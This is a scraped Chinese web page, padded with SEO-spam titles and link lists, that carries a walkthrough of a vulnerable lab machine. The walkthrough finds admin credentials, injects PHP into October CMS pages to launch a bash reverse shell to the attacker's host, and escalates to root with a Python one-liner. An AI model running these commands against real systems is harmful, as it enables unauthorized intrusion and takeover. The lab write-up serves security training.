当前位置: 首页 > news >正文

汕头网站建设只需要800手机建网站软件

汕头网站建设只需要800,手机建网站软件,网页设计素材主题,服装设计个人工作室环境准备 靶机链接:百度网盘 请输入提取码 提取码:3e4s 虚拟机网络链接模式:桥接模式 攻击机系统:kali linux 2021.1 信息收集 1.探测目标靶机ip。 2.探测靶机开放端口和服务情况。 漏洞探测 1.访问网页 2.用dirsearch扫描…

环境准备

靶机链接:百度网盘 请输入提取码

提取码:3e4s

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

1.探测目标靶机ip。

2.探测靶机开放端口和服务情况。

漏洞探测

1.访问网页

2.用dirsearch扫描目录

dirsearch -u 192.168.1.101

3.访问目录是一个登录界面

4.查看下8080端口的源码,发现一个超链接信息

5.访问这个信息,发现用户名,密码

user - admin

password - adminadmin2

6.成功登录第三步的登录界面

漏洞利用

1.谷歌下发现这个October(十月)是一个用php语言搭建的cms

2.上传不了文件

3.虽然不能上传文件,但可以添加一个网页

4.保存之后,点击preview ; 发现报错,位置在右下角的code,这应该要php代码

5.直接谷歌 october cms code reverse shell

6.直接将查到的信息粘贴进code里 function onStart() { echo 123; }

7.再点击preview后没有报错,说明成功添加了一个网页

8.这次直接把code下面换成反弹shell的php代码,用exech函数来执行

function onStart() { echo exec('bash -c "bash -i >& /dev/tcp/192.168.1.106/4444 0>&1"'); }

权限提升

1.开启监听后,点击preview即可回弹shell

2.发现python3.7有root权限

3.直接提权,成功拿下!!!

/usr/bin/python3.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'

http://www.dinnco.com/news/39210.html

相关文章:

  • 贵阳网站设计找哪家关键词挖掘方法
  • 网站建设经营属性网站推广排名
  • 网站在建设中无法访问深圳推广不动产可视化查询
  • wordpress怎样发布时间seo在线培训机构
  • 域名注册网站有哪些网络市场营销策划书
  • 可以做动画的网站有哪些长尾关键词挖掘工具爱网站
  • 做网站公司关键词化外百度账号注册入口
  • 如何做网站优化 纯外链电商大数据查询平台免费
  • 万网总裁张向东官网seo优化找哪家做
  • 可以做动画的网站seo运营招聘
  • 网站用户维度seo网站优化技术
  • 专业室内设计 网站网络舆情监测与研判
  • 苏州运营推广网站建设免费二级域名分发平台
  • 建设数据库网站需要哪些设备数字营销
  • 怎么做网站开发的方案互联网运营培训课程
  • 备案时网站服务内容今日头条新闻发布
  • 网站免费正能量软件下载百度收录技巧
  • 网站弹出窗口代码长沙网站seo服务
  • 高校后勤网站建设存在的问题百度流量统计
  • 哪个网站推荐做挖机事的微软优化大师
  • 装饰工程投标书济南网站自然优化
  • 微信可以做网站吗seo营销工具
  • 网站规划与建设进度真正免费的网站建站平台推荐
  • 网站建设的基本流程群站优化之链轮模式
  • 做h5哪个网站好企业如何进行搜索引擎优化
  • 网络工作室属于什么行业系统优化软件
  • 制作网站 个人优化防疫措施
  • 哪家网站建设比较好360手机助手
  • 网页设计最牛的网站建设小广告多的网站
  • 安徽省住房和城乡建设部网站视频号视频怎么看下载链接